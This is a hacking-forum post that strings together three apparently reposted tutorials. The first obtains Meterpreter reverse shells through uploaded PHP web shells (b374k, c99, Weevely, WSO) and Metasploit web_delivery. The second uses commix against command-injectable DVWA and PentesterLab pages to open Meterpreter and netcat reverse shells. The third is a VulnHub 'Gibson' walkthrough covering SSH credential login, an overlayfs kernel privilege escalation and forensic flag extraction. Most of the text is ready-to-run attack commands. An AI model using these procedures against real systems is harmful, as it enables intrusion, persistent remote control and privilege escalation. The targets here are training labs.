Login

**NINZA** · 04-26-2020, 09:37 AM

0			0

Through this article, you will learn how we can achieve meterpreter shell after uploading a PHP backdoor script in victim’s PC. You can read

[To see content please register here]

previous article to upload PHP web shell in a web server.
Type msfconsole and load Metasploit framework
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.0.104
msf exploit (web_delivery)>set srvport 8081
msf exploit (web_delivery)>exploit
1
2
3
4
5
6
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.0.104
msf exploit (web_delivery)>set srvport 8081
msf exploit (web_delivery)>exploit
Copy the highlighted text shown in below window
[Image: 2.png?w=687&ssl=1]

Meterpreter shell using b374k
Now from given screenshot, you can see here we have successfully uploaded b374k script and now paste above copied malicious code and execute it as a command.
[Image: 4.png?w=687&ssl=1]

When the above code gets executed you will get meterpreter session 1.
sessions –i 1
sysinfo
1
2
sessions –i 1
sysinfo
[Image: 5.png?w=687&ssl=1]

Meterpreter shell using c99 shell
Repeat the same process; after uploading c99 script in a web server now paste that PHP code which we have got through web delivery inside the c99 shell script and execute as a command.
[Image: 7.png?w=687&ssl=1]

This will give you another meterpreter session.
sysinfo
1
sysinfo
[Image: 8.png?w=687&ssl=1]

Meterpreter shell using Weevely
Once you have uploaded weevely backdoor inside web server now repeat the same process inside weevely as I have done and past malicious PHP code which we have got through web delivery and hit enter.
[Image: 9.png?w=687&ssl=1]

Here one more session will get opened for the meterpreter shell.
sysinfo
1
sysinfo
[Image: 10.png?w=687&ssl=1]

Meterpreter shell using wso2.5.1.php
Now next step is to get a meterpreter shell through the wso2.5.1.php script and again repeat the same step for web delivery to get the malicious PHP code and past that code under this script and execute as a command.
[Image: 12.png?w=687&ssl=1]

Congrats We have successfully access meterpreter shell through different php script Here we have again a meterpreter session
sysinfo
1
sysinfo
[Image: 13.png?w=687&ssl=1]

Commix is an automated command injection tool. It lets you have a meterpreter session via command injection if the web application is vulnerable to it. It’s pretty efficient and reliable. Commix is widely used by security experts, penetration testers and also web developers in order to find vulnerabilities. In this article, we will learn how to get a meterpreter session using commix. For the detailed guide on commix click

[To see content please register here]

.
Requirements :

DVWA (for Windows 10)
PentesterLab (for Linux testing)
Kali Linux
Commix

As you can see in the image below the environment of DVWA is vulnerable to command injection. Submit the local host request from DVWA.
[Image: 1.png?w=687&ssl=1]

Capture the previously submitted request through BurpSuite by simultaneously turning on the intercept as shown in the image below :
[Image: 2.png?w=687&ssl=1]

Once the cookies are capture, copy the whole cookie and paste it in a TXT file. Now, use the following command in order to exploit the vulnerability of Command injection in the DVWA environment :
commix -r /root/Desktop/req.txt
1
commix -r /root/Desktop/req.txt
here,
–r: refers to the path of request file which will load HTTP.
As the exploitation is successful, it will ask you if you want to load the pseudo terminal or not. Type ‘y’ for the pseudo terminal and it will be loaded. Use the command ‘whoami’ to check the user as shown in the image :
[Image: 3.png?w=687&ssl=1]

Now that you are in the pseudo terminal, type the following set of command in order to generate reverse shell :
reverse_tcp
set lhost 192.168.1.107
set lport 1234
1
2
3
reverse_tcp
set lhost 192.168.1.107
set lport 1234
After executing the above commands, it will ask you if you want to have a netcat shell or other (meterpreter) shell. So, press 2 for the meterpreter one. Then it will ask you which meterpreter session you want as in whether you want it to be PHP, Windows, etc. As our DWVA is setup on windows, we will select option 10. Then it will further ask you to choose a particular power shell injection. Choose 1 as of now as we will try other options too.
[Image: 4.png?w=687&ssl=1]

When everything is done, it will give a resource file with the execution command. Open a new terminal window and type the command there, as in our case it generated the following command :
msfconsole -r /usr/share/commix/powershell_attack.rc
1
msfconsole -r /usr/share/commix/powershell_attack.rc
[Image: 5.png?w=687&ssl=1]

As the above command is executed, you will directly have your meterpreter session as shown in the image above.
Now, repeat the above steps as they are but instead of choosing 1 option of power shell injection to choose 2 this time as it will help us get meterpreter session through magic unicorn. After choosing option 2, it will again generate a resource file that is to be executed in the new terminal window. In our case the following command was generated :
msfconsole -r /usr/share/magic-unicorn/unicorn.rc
1
msfconsole -r /usr/share/magic-unicorn/unicorn.rc
[Image: 6.png?w=687&ssl=1]

Again, when the command is executing you will have your meterpreter session as shown in the image below :
[Image: 7.png?w=687&ssl=1]

All the above meterpreter session were taken using option 10 under the category of the meterpreter reverse shell. But this time we will use option 11, which is web delivery, to have a meterpreter session. So, repeat the same steps as above but this time choose 11 option when asked for which meterpreter reverse shell you want.
[Image: 8.png?w=687&ssl=1]

Then once you have chosen option 11, it will ask whether you want web delivery script for PHP, Python or windows. Now, as we are attacking windows select option 3.
[Image: 9.png?w=687&ssl=1]

Once again, it will give you a resource file and a command that is to be run in the new terminal window. In our case, the following command was generated :
msfconsole -r /usr/share/commix/web_delivery.rc
1
msfconsole -r /usr/share/commix/web_delivery.rc
As the command is executed, you will have your meterpreter session as shown in the image below :
[Image: 10.png?w=687&ssl=1]

Until now, all the meterpreter session we took were in the Window’s environment. Now, will be gain meterpreter session in Linux’s environment. For this, we will use PentesterLab.
[Image: 11.png?w=687&ssl=1]

Just like we did for windows, capture the cookies of pentesterlab in burp suite as shown in the image below :
[Image: 12.png?w=687&ssl=1]

Copy the contents of the cookies in a TXT file and use the following command to attack :
commix -r /root/Desktop/1.txt
1
commix -r /root/Desktop/1.txt
As the exploitation is successful, it will ask you if you want to load the pseudo terminal or not. Type ‘y’ for the pseudo terminal and it will be loaded. Use the command ‘whoami’ to check the user as shown in the image :
[Image: 13.png?w=687&ssl=1]

Now that you are in the pseudo terminal, type the following set of command in order to generate reverse shell :
reverse_tcp
set lhost 192.168.1.107
set lport 1234
1
2
3
reverse_tcp
set lhost 192.168.1.107
set lport 1234
After executing the above commands, it will ask you if you want to have a netcat shell or other (meterpreter) shell. So, press 2 for the meterpreter one. Then it will ask you which meterpreter session you want as in whether you want it to be PHP, Windows, etc. As we are now testing on Linux, we will select option 8 i.e. a PHP meterpreter reverse shell.
[Image: 14.png?w=687&ssl=1]

Just like before, this too will generate a resource file which you have to execute in a new terminal window. In our case, the command generated was :
msfconsole -r /usr/share/commix/php_meterpreter.rc
1
msfconsole -r /usr/share/commix/php_meterpreter.rc
As the above command is executed, you will have your session as shown in the image below :
[Image: 15.png?w=687&ssl=1]

The other method we will use to exploit Linux is by using web delivery. Repeat the above steps similarly, but instead of choosing option 8, this time choose option 11 for web delivery. And then choose option 2 for a PHP reverse shell.
[Image: 16.png?w=687&ssl=1]

Executing the above steps will create a resource file yet again. Run the command given in the new terminal window :
msfconsole -r /usr/share/commix/web_delivery.rc
1
msfconsole -r /usr/share/commix/web_delivery.rc
[Image: 17.png?w=687&ssl=1]

Running the above command will give you your session as shown in the above image. This is how you can gain a meterpreter session through command injection vulnerability using commix. The session can be acquired in both Windows and Linux platforms.

Commix is an automated command injection tool. It lets you have a meterpreter or netcat session via command injection if the web application is vulnerable to it. It’s pretty efficient and reliable. Commix is widely used by security experts, penetration testers and also web developers in order to find vulnerabilities. In this article, we will learn how to get a netcat session using commix. For the detailed guide on commix click

[To see content please register here]

.
Requirements :

PentesterLab (for Linux testing)
Kali Linux
Commix

As you can see in the image below the environment of PentesterLab is vulnerable to command injection.
[Image: 1.png?w=687&ssl=1]

capture the cookies of pentesterlab in burp suite as shown in the image below :
[Image: 2.png?w=687&ssl=1]

Copy the contents of the cookies in a TXT file and use the following command to attack :
commix -r /root/Desktop/1.txt
1
commix -r /root/Desktop/1.txt
As the exploitation is successful, it will ask you if you want to load the pseudo terminal or not. Type ‘y’ for the pseudo terminal and it will be loaded. Use the command ‘whoami’ to check the user as shown in the image :
[Image: 3.png?w=687&ssl=1]

Now that you are in the pseudo terminal, type the following set of command in order to generate reverse shell :
reverse_tcp
set lhost 192.168.1.107
set lport 4321
1
2
3
reverse_tcp
set lhost 192.168.1.107
set lport 4321
After executing the above commands, it will ask you if you want to have a netcat shell or other (meterpreter) shell. Choose option 1 as we will try to take a netcat session. Then choose option 1 to use default netcat settings for the target. Then type y to use /bin as your subdirectory.
[Image: 4.png?w=687&ssl=1]

Simultaneously, turn on the netcat listener by using the following command :
nc -lvp 4321
1
nc -lvp 4321
And as the execution of the steps goes right, you will have your session as shown in the image below :
[Image: 5.png?w=687&ssl=1]

Another method to get a netcat session is by using different settings of netcat. For this, repeat the above steps, but this time around, choose option 3 under the category of ‘unix-like targets’ for the traditional netcat settings.
[Image: 6.png?w=687&ssl=1]

Again, simultaneously start the netcat listener with the following command :
nc -lvp 1234
1
nc -lvp 1234
[Image: 7.png?w=687&ssl=1]

This way, you can use commix yet again to gain netcat session through various methods.

Hello friends!! Welcome to our next CTF challenge of the vulnhub called “Gibson” which is a boot to root challenge with the ultimate goal to get the Flag and finish the task. This VM is designed to test your penetration testing skills by spawning the root shell of this machine which is weak configured and the author has asked to find the hidden flag through privilege escalation. You can download it from the given below link. I found this lab more interesting as it has involved cyber forensic in it to get the final flag.
Download it from here:

[To see content please register here]

Penetration Methodology

Network Scanning (Netdiscover, Nmap)
Abusing HTTP service for username & password
Spawning Pty shell SSH (Metasploit)
Privilege Escalation via Kernel exploit
Uploading LinEnum script
Obtain disk image
Forensic Analysis for extracting hidden flag.img
Decrypt GPG encrypted file using leet encoded value
Capture the Flag

Let’s start off with scanning the network to find our targets IP.
netdiscover
1
netdiscover
[Image: 1.png?w=687&ssl=1]

As our target IP is 192.168.1.100, now move to network enumeration and for this, we are going to scan network IP using nmap which will show all the open ports.
nmap -A 192.168.1.100
1
nmap -A 192.168.1.100
In this case, open ports are only two i.e. 22 and 80 moreover it has found an html file.
[Image: 2.png?w=687&ssl=1]

As from the above result, we have got 80 port open so we will open target IP in a browser.
[Image: 3.png?w=687&ssl=1]

It shows an accessible html page. But when we try to open it, we cannot see any crucial information here. It’s written the result will be found by brute force but there is no place where we can apply brute force.
[Image: 4.png?w=687&ssl=1]

As we do not have any other option so let’s just go to page source code to see if we could get any clue to move further in our task.
Ohhh!! Great, there is something which is connecting to username and password, as per my prediction here god could be the possible password and margo could be the username.
[Image: 5.png?w=687&ssl=1]

Now from our nmap result, we saw port 22 open for ssh login. So let’s try to login into ssh using above found credential and for this, we will be taking help of Metasploit framework. By using the following module we can gain meterpreter session, once get successfully exploit.
use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) >set rhosts 192.168.1.100
msf auxiliary(scanner/ssh/ssh_login) >set username margo
msf auxiliary(scanner/ssh/ssh_login) >set password god
msf auxiliary(scanner/ssh/ssh_login) >exploit
1
2
3
4
5
use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) >set rhosts 192.168.1.100
msf auxiliary(scanner/ssh/ssh_login) >set username margo
msf auxiliary(scanner/ssh/ssh_login) >set password god
msf auxiliary(scanner/ssh/ssh_login) >exploit
Hmm!! That’s great we have compromised the target machine, and you will love to see that the default opened session is command shell session and further we had upgrade into meterpreter session. And then run the “sysinfo” command to identify system architecture.
As it was Ubuntu 14.04 (Linux 3.19.0-25-generic) so I search in Google for its kernel exploit for privilege escalation.
[Image: 7.png?w=687&ssl=1]

Luckily, I found this kernel was badly affected by Overlayfs – A Local Privilege Escalation. Superb the Metasploit has an in-built module for this exploit.
use exploit/linux/local/overlayfs_priv_esc
msf exploit(linux/local/overlayfs_priv_esc) > set session 1
msf exploit(linux/local/overlayfs_priv_esc) > set lhost 192.168.1.109
msf exploit(linux/local/overlayfs_priv_esc) > exploit
1
2
3
4
use exploit/linux/local/overlayfs_priv_esc
msf exploit(linux/local/overlayfs_priv_esc) > set session 1
msf exploit(linux/local/overlayfs_priv_esc) > set lhost 192.168.1.109
msf exploit(linux/local/overlayfs_priv_esc) > exploit
Here again you will love to see that the default opened session is command shell session and further, we had upgrade into meterpreter session.
sessions -u 3
1
sessions -u 3
[Image: 8.png?w=687&ssl=1]

Now let’s upload LinEnum which is a scripted Local Linux Enumeration & Privilege Escalation Checks Shellscript that enumerates the system configuration and high-level summary of the checks/tasks performed by LinEnum.
To more about LinEnum script visit given below link:

[To see content please register here]

upload /root/pentest/privs/LinEnum.sh .
chmod 777 LinEnum.sh
./LinEnum.sh
1
2
3
upload /root/pentest/privs/LinEnum.sh .
chmod 777 LinEnum.sh
./LinEnum.sh
[Image: 9.png?w=687&ssl=1]

Here we get some interesting file which is highlighted in the below image. It shows some external server is running.
[Image: 10.png?w=687&ssl=1]

Now from the process list, we see something like ftpserv so we can just search for a file based on that.
find / -name ftpserv*
1
find / -name ftpserv*
Awesome it gives us “ftpserv.img” file which can prove to be a useful thing, let’s download it in our local machine with the help of the following command.
download /var/lib/libvirt/images/ftpserv.img /root/Desktop/
1
download /var/lib/libvirt/images/ftpserv.img /root/Desktop/
[Image: 11.png?w=687&ssl=1]

So let’s check out what type of file it is? With the help of file command, it shown the complete detail of the image file and hence by this, we came to know that this image file belongs to partition boot sector that contains all information of file system uses to access the volume.
Now let’s find out the partition table of the device along with give sizes in the sector with the help of the following command
fdisk -lu ftpserv.img
1
fdisk -lu ftpserv.img
Wonderful! It is a FAT16 file system and as we have entered into forensic phase, therefore you should have a little knowledge of cyber forensics. So we are going use Sleuth kit which is a command line forensic analysis tool kit to extract List file and directory names from this image with the help of the following command.
fls -f fat16 -o 63 ftpserv.img
1
fls -f fat16 -o 63 ftpserv.img
Hmmm!! Here I found something very interesting a “garbage” folder, let’s explore this by executing below command.
fls -f fat16 -o 63 ftpserv.img 12
1
fls -f fat16 -o 63 ftpserv.img 12
Awesome!! It was good to see an image file “flag.img” along with its inode number. An inode number holds metadata and I’m pretty sure that we will tack that information from inside the flag.img. Let’s extract all content of ftpserv.img in flag.img and then mount it.
icat -f fat16 -o 63 ftpserv.img 845580 > flag.img
mount flag.img /mnt
cd /mnt
ls
1
2
3
4
icat -f fat16 -o 63 ftpserv.img 845580 > flag.img
mount flag.img /mnt
cd /mnt
ls
Booom!! Here I saw the very interesting file “hint.txt” which is holding two links.
[Image: 12.png?w=687&ssl=1]

So when I visit both links then I found “johnny lee miller” is a common character in both links and in hacker movie he is called by “Zero Cool”.
Then we explored more and found the hidden directory /.trash which holds an encrypted file flag.txt.gpg but “zero Cool” wasn’t the correct passphrase and it took an almost whole day to decrypt it.
At last I thought from the hacker’s vision and encode the “zero Cool” into the leet function but unfortunately, I was unable to decrypt the encrypted file with the help of Z3r0C00l.
But finally, obtain the correct passphrase Z3r0K00l by replacing C alphabet from K and execute the following command to decrypt gpg encryption.
gpg --passphrase Z3r0K00l flag.txt.gpg
1
gpg --passphrase Z3r0K00l flag.txt.gpg
[Image: 15.png?w=687&ssl=1]

Hurray!! We successfully decrypted the file and obtain the flag.txt file.
[Image: 16.png?w=687&ssl=1]

Login
Username: Password: Lost Password? Remember me
Or Register an account

Announcement : For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis

Announcement :

For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis